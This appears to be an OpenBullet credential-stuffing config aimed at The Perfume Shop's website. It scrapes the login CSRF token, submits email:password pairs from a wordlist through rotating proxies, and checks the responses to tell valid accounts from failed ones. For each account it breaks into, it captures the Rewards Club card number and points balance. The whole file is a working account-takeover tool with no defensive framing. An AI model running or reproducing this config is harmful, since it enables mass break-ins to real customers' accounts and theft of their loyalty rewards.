[SETTINGS]
{
  "Name": "theperfumeshop",
  "SuggestedBots": 1,
  "LastModified": "2018-11-20T08:24:05.7307198+00:00",
  "AdditionalInfo": "",
  "Author": "WEBKILLER",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 50,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [
    {
      "SliceName": "PASS",
      "RuleType": 2,
      "RuleString": "6",
      "Id": 1212657782
    }
  ],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://www.theperfumeshop.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#CSRFToken PARSE "<SOURCE>" LR "TPS.CSRFToken = '" "';" Recursive=FALSE -> VAR "CSRFToken" "" "" 
REQUEST POST "https://www.theperfumeshop.com/j_spring_security_check" AutoRedirect=TRUE 
  CONTENT "j_username=<USER>&j_password=<PASS>&_spring_security_remember_me=false&CSRFToken=<CSRFToken>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://www.theperfumeshop.com" 
  HEADER "Referer: https://www.theperfumeshop.com/login" 
  HEADER "X-NewRelic-ID: UwcAWVJUGwsCXVBVAAU=" 
  HEADER "X-Requested-With: XMLHttpRequest" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "BadCredentials" 
  KEYCHAIN Success OR 
    KEY "<li class=\"signout\">" 
REQUEST GET "https://www.theperfumeshop.com/my-account/loyalty" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#Rewards_Club_Card_No PARSE "<SOURCE>" LR "<div id=\"barcode\" data-code=\"" "\" data-bar-height" Recursive=FALSE -> CAP "Rewards Club Card No" "" "" 
#POINTS_BALANCE PARSE "<SOURCE>" LR "<p class=\"p-points-balance--amount\">" "</p>" Recursive=FALSE -> CAP "POINTS BALANCE" "" "" 
